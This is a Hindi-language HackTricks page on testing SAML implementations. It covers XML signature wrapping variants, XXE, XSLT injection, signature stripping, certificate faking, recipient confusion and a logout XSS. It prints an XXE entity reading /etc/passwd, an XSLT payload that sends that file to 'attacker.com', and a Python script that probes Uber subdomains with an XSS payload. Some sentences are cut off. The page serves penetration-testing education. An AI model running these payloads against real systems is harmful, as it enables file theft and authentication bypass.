.. | ||
README.md | ||
saml-basics.md |
SAML हमले
SAML हमले
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
- 💬 Discord समूह में शामिल हों या telegram समूह में या Twitter पर 🐦 @carlospolopm को फॉलो करें.
- अपनी हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके.
मूल जानकारी
{% content-ref url="saml-basics.md" %} saml-basics.md {% endcontent-ref %}
हमलों का ग्राफिक
उपकरण
SAMLExtractor: एक उपकरण जो URL या URL की सूची ले सकता है और SAML consume URL वापस प्रिंट करता है।
XML राउंड-ट्रिप
XML में, XML का हस्ताक्षरित भाग मेमोरी में सहेजा जाता है, फिर कुछ एन्कोडिंग/डिकोडिंग की जाती है और हस्ताक्षर की जांच की जाती है। आदर्श रूप से यह एन्कोडिंग/डिकोडिंग डेटा को बदलना नहीं चाहिए लेकिन उस परिदृश्य के आधार पर, जांच किया गया डेटा और मूल डेटा समान नहीं हो सकता है।
उदाहरण के लिए, निम्नलिखित कोड की जांच करें:
require 'rexml/document'
doc = REXML::Document.new <<XML
<!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
<X>
<Y/><![CDATA[--><X><Z/><!--]]>-->
</X>
XML
puts "First child in original doc: " + doc.root.elements[1].name
doc = REXML::Document.new doc.to_s
puts "First child after round-trip: " + doc.root.elements[1].name
प्रोग्राम को REXML 3.2.4 या उससे पहले के संस्करण पर चलाने से निम्नलिखित आउटपुट मिलेगा:
First child in original doc: Y
First child after round-trip: Z
ऊपर दिए गए कार्यक्रम से मूल XML दस्तावेज़ को REXML ने इस प्रकार देखा:
और पार्सिंग और सीरियलाइजेशन के एक दौर के बाद इसे इस प्रकार देखा:
कमजोरी के बारे में और इसका दुरुपयोग कैसे करें, अधिक जानकारी के लिए:
- https://mattermost.com/blog/securing-xml-implementations-across-the-web/
- https://joonas.fi/2021/08/saml-is-insecure-by-design/
XML Signature Wrapping Attacks
XML हस्ताक्षर वाले XML दस्तावेज़ आमतौर पर दो स्वतंत्र चरणों में प्रोसेस किए जाते हैं: हस्ताक्षर मान्यता और कार्य आह्वान (व्यापार तर्क). यदि दोनों मॉड्यूल डेटा पर अलग-अलग दृष्टिकोण रखते हैं, तो XML Signature Wrapping attacks (XSW) नामक एक नई श्रेणी की कमजोरियां होती हैं।
इन हमलों में आक्रमणकारी संदेश संरचना में परिवर्तन करता है जाली तत्वों को इंजेक्ट करके जो XML हस्ताक्षर को अमान्य नहीं करते. इस परिवर्तन का उद्देश्य संदेश को इस प्रकार बदलना है कि एप्लिकेशन तर्क और हस्ताक्षर मान्यता मॉड्यूल संदेश के अलग-अलग हिस्सों का उपयोग करें. परिणामस्वरूप, प्राप्तकर्ता XML हस्ताक्षर को सफलतापूर्वक मान्य करता है लेकिन एप्लिकेशन तर्क जाली तत्व को प्रोसेस करता है. इस प्रकार आक्रमणकारी इंटीग्रिटी सुरक्षा और XML हस्ताक्षर के मूल प्रमाणीकरण को दरकिनार कर देता है और मनमानी सामग्री इंजेक्ट कर सकता है।
SAML अनुरोध से:
XSW #1
एक आक्रमणकारी नया मूल तत्व जोड़ सकता है जहां हस्ताक्षर पाया जाता है। इसलिए, जब मान्यता प्रदाता हस्ताक्षर की अखंडता की जांच करता है तो यह देख सकता है कि उसे Response -> Assertion -> Subject की अखंडता की जांच करनी है, और यह लाल रंग में बुरे नए Response -> Assertion -> Subject पथ से भ्रमित हो सकता है और उसके डेटा का उपयोग कर सकता है।
XSW #2
#1 के साथ अंतर यह है कि इस्तेमाल किए गए हस्ताक्षर का प्रकार एक डिटैच्ड हस्ताक्षर है जहां XSW #1 में एक एनवेलपिंग हस्ताक्षर का उपयोग किया गया था।
ध्यान दें कि नया बुरा संरचना पहले की तरह ही है, अखंडता जांच के बाद व्यापार तर्क को भ्रमित करने की कोशिश कर रही है।
XSW #3
इस हमले में एक बुरा Assertion मूल assertion के समान स्तर पर बनाया गया है ताकि व्यापार तर्क को भ्रमित किया जा सके और बुरे डेटा का उपयोग किया जा सके।
XSW #4
XSW #4 #3 के समान है, सिवाय इसके कि इस मामले में मूल Assertion कॉपी किए गए Assertion का बच्चा बन जाता है।
XSW #5
XSW #5 में हस्ताक्षर और मूल Assertion तीन मानक कॉन्फ़िगरेशनों में से एक में नहीं हैं (enveloped/enveloping/detached). इस मामले में, कॉपी किया गया Assertion हस्ताक्षर को एनवेलप करता है।
XSW #6
XSW #6 अपने कॉपी किए गए Assertion को #4 और #5 के समान स्थान पर डालता है। यहां दिलचस्प बात यह है कि कॉपी किया गया Assertion हस्ताक्षर को एनवेलप करता है, जो बदले में मूल Assertion को एनवेलप करता है।
XSW #7
XSW #7 एक Extensions तत्व डालता है और कॉपी किए गए Assertion को एक बच्चे के रूप में जोड़ता है। Extensions एक मान्य XML तत्व है जिसकी स्कीमा परिभाषा कम प्रतिबंधात्मक है। इस श्वेत पत्र के लेखकों ने OpenSAML पुस्तकालय के जवाब में यह विधि विकसित की। OpenSAML ने स्कीमा मान्यता का उपयोग करके हस्ताक्षर मान्यता के दौरान इस्तेमाल की गई ID की मूल Assertion की ID से सही तुलना की। लेखकों ने पाया कि जहां कॉपी किए गए Assertions जिनकी ID मूल Assertion की ID के समान थी, वे कम प्रतिबंधात्मक स्कीमा परिभाषा वाले तत्व के बच्चे थे, वे इस विशेष प्रतिरोधी उपाय को दरकिनार करने में सक्षम थे।
XSW #8
XSW #8 एक और कम प्रतिबंधात्मक XML तत्व का उपयोग करता है XSW #7 में इस्तेमाल किए गए हमले के पैटर्न का एक विविधता करने के लिए। इस बार मूल Assertion कॉपी किए गए Assertion के बजाय कम प्रतिबंधात्मक तत्व का बच्चा है।
उपकरण
आप अनुरोध को पार्स करने, किसी भी XSW हमले को चुनने और उसे लॉन्च करने के लिए Burp एक्सटेंशन SAML Raider का उपयोग कर सकते हैं।
मूल पेपर
इस हमले के बारे में अधिक जानकारी के लिए मूल पेपर पढ़ें https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf
XXE
यदि आपको नहीं पता कि XXE किस प्रकार के हमले हैं, तो कृपया निम्नलिखित पृष्ठ पढ़ें:
{% content-ref url="../xxe-xee-xml-external-entity.md" %} xxe-xee-xml-external-entity.md {% endcontent-ref %}
इस तथ्य के कारण कि SAML Responses डिफ्लेटेड और base64’d XML दस्तावेज़ होते हैं, हम SAML Response के रूप में भेजे गए XML दस्तावेज़ को मैनिपुलेट करके XXE के लिए परीक्षण कर सकते हैं। उदाहरण:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "file:///etc/passwd">
<!ENTITY dtd SYSTEM "http://www.attacker.com/text.dtd" >]>
<samlp:Response ... ID="_df55c0bb940c687810b436395cf81760bb2e6a92f2" ...>
<saml:Issuer>...</saml:Issuer>
<ds:Signature ...>
<ds:SignedInfo>
<ds:CanonicalizationMethod .../>
<ds:SignatureMethod .../>
<ds:Reference URI="#_df55c0bb940c687810b436395cf81760bb2e6a92f2">...</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>...</ds:SignatureValue>
[...]
टूल
आप Burp एक्सटेंशन SAML Raider का उपयोग करके SAML अनुरोध से POC उत्पन्न करने के लिए कर सकते हैं ताकि संभावित XXE संवेदनशीलताओं के लिए परीक्षण किया जा सके।
इस वार्ता को भी देखें: https://www.youtube.com/watch?v=WHn-6xHL7mI
XSLT via SAML
XSLT के बारे में अधिक जानकारी के लिए जाएँ:
{% content-ref url="../xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %} xslt-server-side-injection-extensible-stylesheet-language-transformations.md {% endcontent-ref %}
Extensible Stylesheet Language Transformation (XSLT) एक Turing-complete भाषा है जो XML दस्तावेजों को HTML, JSON, या PDF जैसे अन्य दस्तावेज प्रकारों में परिवर्तित करने के लिए है। यहाँ एक महत्वपूर्ण पहलू यह है कि हमले के सफल होने के लिए एक वैध हस्ताक्षर की आवश्यकता नहीं है। इसका कारण यह है कि XSLT परिवर्तन डिजिटल हस्ताक्षर की सत्यापन के लिए प्रक्रिया किए जाने से पहले होता है। मूल रूप से, हमें हमले को प्रदर्शन करने के लिए एक हस्ताक्षरित SAML प्रतिक्रिया की आवश्यकता है, लेकिन हस्ताक्षर स्व-हस्ताक्षरित या अमान्य हो सकता है।
यहाँ आप इस प्रकार की संवेदनशीलताओं के लिए एक POC पा सकते हैं, इस खंड की शुरुआत में उल्लिखित hacktricks पृष्ठ पर आप पेलोड्स के लिए खोज सकते हैं।
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
<ds:Transforms>
<ds:Transform>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="doc">
<xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
<xsl:variable name="escaped" select="encode-for-uri($file)"/>
<xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
<xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/>
<xsl:value-of select="unparsed-text($exploitUrl)"/>
</xsl:template>
</xsl:stylesheet>
</ds:Transform>
</ds:Transforms>
...
</ds:Signature>
उपकरण
आप Burp एक्सटेंशन SAML Raider का उपयोग करके SAML अनुरोध से POC उत्पन्न करने के लिए कर सकते हैं ताकि संभावित XSLT संवेदनशीलताओं के लिए परीक्षण किया जा सके।
इस वार्ता को भी देखें: https://www.youtube.com/watch?v=WHn-6xHL7mI
XML हस्ताक्षर निष्कासन
हस्ताक्षर निष्कासन का उपयोग यह परीक्षण करने के लिए किया जाता है कि SAML कार्यान्वयन हस्ताक्षर तत्व के अभाव में कैसे व्यवहार करता है। जब हस्ताक्षर तत्व अनुपस्थित होता है, तो हस्ताक्षर सत्यापन चरण पूरी तरह से छोड़ा जा सकता है। यदि हस्ताक्षर की पुष्टि नहीं की जाती है, तो उन सभी सामग्रियों को जो आमतौर पर हस्ताक्षरित होती हैं, उन्हें हमलावर द्वारा बदला जा सकता है।
उपकरण
हस्ताक्षर निष्कासन SAML प्रतिक्रिया को इंटरसेप्ट करने के साथ शुरू होता है और फिर Remove Signatures
पर क्लिक करता है। ऐसा करने से सभी हस्ताक्षर तत्व हटा दिए जाते हैं।
हस्ताक्षरों को हटाने के बाद, अनुरोध को लक्ष्य की ओर बढ़ने दें। यदि हस्ताक्षर सेवा द्वारा आवश्यक नहीं है
प्रमाणपत्र नकलीकरण
प्रमाणपत्र नकलीकरण यह परीक्षण करने की प्रक्रिया है कि क्या सेवा प्रदाता यह सत्यापित करता है कि एक विश्वसनीय पहचान प्रदाता ने SAML संदेश पर हस्ताक्षर किए हैं। SP और IdP के बीच विश्वास संबंध स्थापित होता है और हर बार जब SAML संदेश प्राप्त होता है तो इसे सत्यापित किया जाना चाहिए। इसका मतलब है कि एक स्व-हस्ताक्षरित प्रमाणपत्र का उपयोग करके SAML प्रतिक्रिया या दावे पर हस्ताक्षर करना।
उपकरण
Burp एक्सटेंशन SAML Raider का उपयोग किया जाएगा।
प्रमाणपत्र नकलीकरण करने के लिए, SAML प्रतिक्रिया को इंटरसेप्ट करने से शुरू करें।
यदि प्रतिक्रिया में हस्ताक्षर शामिल है, तो Send Certificate to SAML Raider Certs
बटन का उपयोग करें।
प्रमाणपत्र भेजने के बाद, हमें SAML Raider प्रमाणपत्र टैब में एक आयातित प्रमाणपत्र दिखाई देना चाहिए। वहां पहुंचने पर, हम आयातित प्रमाणपत्र को हाइलाइट करते हैं और Save and Self-Sign
बटन दबाते हैं।
ऐसा करने से मूल प्रमाणपत्र की एक स्व-हस्ताक्षरित क्लोन उत्पन्न होती है। अब यह समय है कि बर्प के प्रॉक्सी में अभी भी रुके हुए इंटरसेप्ट किए गए अनुरोध पर वापस जाएं। पहले, XML हस्ताक्षर ड्रॉपडाउन मेनू से नए स्व-हस्ताक्षरित प्रमाणपत्र का चयन करें। फिर Remove Signatures
बटन का उपयोग करके किसी भी मौजूदा हस्ताक्षरों को हटा दें। अंत में, (Re-)Sign Message
या (
Re-)Sign Assertion
बटन का उपयोग करें (जो भी आपकी दी गई स्थिति में अधिक उपयुक्त हो)।
स्व-हस्ताक्षरित प्रमाणपत्र के साथ संदेश पर हस्ताक्षर करने के बाद, इसे भेज दें। यदि हम प्रमाणित करते हैं, तो हम जानते हैं कि हम अपने SAML संदेशों पर हस्ताक्षर कर सकते हैं। अपने SAML संदेशों पर हस्ताक्षर करने की क्षमता का मतलब है कि हम दावे में मानों को बदल सकते हैं और वे सेवा प्रदाता द्वारा स्वीकार किए जाएंगे।
टोकन प्राप्तकर्ता भ्रम / सेवा प्रदाता लक्ष्य भ्रम
टोकन प्राप्तकर्ता भ्रम / सेवा प्रदाता लक्ष्य भ्रम यह परीक्षण करता है कि क्या सेवा प्रदाता प्राप्तकर्ता को सत्यापित करता है। इसका मतलब है कि यदि प्रतिक्रिया किसी अन्य सेवा प्रदाता के लिए थी, तो वर्तमान सेवा प्रदाता को इसे नोटिस करना चाहिए और प्रमाणीकरण को अस्वीकार करना चाहिए।
प्राप्तकर्ता क्षेत्र SubjectConfirmationData तत्व का एक गुण है, जो SAML प्रतिक्रिया में विषय तत्व का एक बच्चा है।
SubjectConfirmationData तत्व अतिरिक्त डेटा निर्दिष्ट करता है जो विषय की पुष्टि करने की अनुमति देता है या विषय पुष्टि की क्रिया के परिस्थितियों को सीमित करता है। विषय पुष्टि तब होती है जब एक भरोसेमंद पक्ष दावे के विषय के बीच संबंध की पुष्टि करना चाहता है (यानी, प्रमाणित करने वाली इकाई)।
SubjectConfirmationData तत्व पर पाया गया प्राप्तकर्ता गुण एक URL है जो उस स्थान को निर्दिष्ट करता है जहां दावे को पहुंचाया जाना चाहिए। यदि प्राप्तकर्ता उस सेवा प्रदाता से अलग है जो इसे प्राप्त करता है, तो दावे को स्वीकार नहीं किया जाना चाहिए।
कैसे करें
SAML टोकन प्राप्तकर्ता भ्रम (SAML-TRC) के लिए हमें शोषण का प्रयास करने के लिए कुछ पूर्व शर्तें होनी चाहिए। पहले, हमें एक सेवा प्रदाता पर एक वैध खाता होना चाहिए। दूसरा, SP-Target को उसी पहचान प्रदाता द्वारा जारी किए गए टोकन स्वीकार करने चाहिए जो SP-Legit की सेवाएं देता है।
यदि शर्तें सच हैं तो हमला अपेक्षाकृत सरल है। हम SP-Legit को साझा पहचान प्रदाता के माध्यम से प्रमाणित करते हैं। फिर हम IdP से SP-Legit के लिए जाने वाली SAML प्रतिक्रिया को इंटरसेप्ट करते हैं। एक बार इंटरसेप्ट करने के बाद, हम SP-Legit के लिए इरादा SAML प्रतिक्रिया को SP-Target के बजाय भेजते हैं। यदि SP-Target दावे को स्वीकार करता है; हम खुद को SP-Legit के लिए उसी खाता नाम के साथ लॉग इन पाएंगे और SP-Target के संबंधित संसाधनों तक पहुंच प्राप्त करेंगे।
लॉगआउट कार्यक्षमता में XSS
([मूल शोध यहां देखें](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-sub
https://carbon-prototype.uberinternal.com:443/oidauth/logout
यह एक लॉगआउट पेज है, मैंने ऊपर दिए गए लिंक को खोला और यह मुझे निम्नलिखित पेज पर रीडायरेक्ट कर दिया।
https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
सामूहिक शोषण
SAMLExtractor का उपयोग करते हुए जो यूआरएल की सूची ले सकता है और फिर आपको वापस कॉलबैक (SAML consume) यूआरएल देता है, मैंने uberinternal.com
के सभी सबडोमेन्स को इस उपकरण में डालने का निर्णय लिया ताकि देख सकूँ कि क्या अन्य डोमेन्स भी उसी लाइब्रेरी का उपयोग कर रहे हैं और वहाँ थे।
जो मैंने अगला किया वह एक स्क्रिप्ट बनाना था जो कमजोर पेज oidauth/prompt
को कॉल करता है और XSS का प्रयास करता है और अगर मेरा इनपुट प्रतिबिंबित होता है तो यह मुझे एक अच्छा कमजोर संदेश देता है।
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from colorama import init ,Fore, Back, Style
init()
with open("/home/fady/uberSAMLOIDAUTH") as urlList:
for url in urlList:
url2 = url.strip().split("oidauth")[0] + "oidauth/prompt?base=javascript%3Aalert(123)%3B%2F%2FFady&return_to=%2F%3Fopenid_c%3D1520758585.42StPDwQ%3D%3D&splash_disabled=1"
request = requests.get(url2, allow_redirects=True,verify=False)
doesit = Fore.RED + "no"
if ("Fady" in request.content):
doesit = Fore.GREEN + "yes"
print(Fore.WHITE + url2)
print(Fore.WHITE + "Len : " + str(len(request.content)) + " Vulnerable : " + doesit)
संदर्भ
ये हमले https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/ से प्राप्त किए गए थे।
आप अतिरिक्त संसाधन और लेखन https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/ में पा सकते हैं।
AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सदस्यता योजनाएं देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा संग्रह विशेष NFTs का
- 💬 Discord समूह में शामिल हों या telegram समूह या Twitter पर मुझे 🐦 @carlospolopm का पालन करें।
- HackTricks और HackTricks Cloud github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।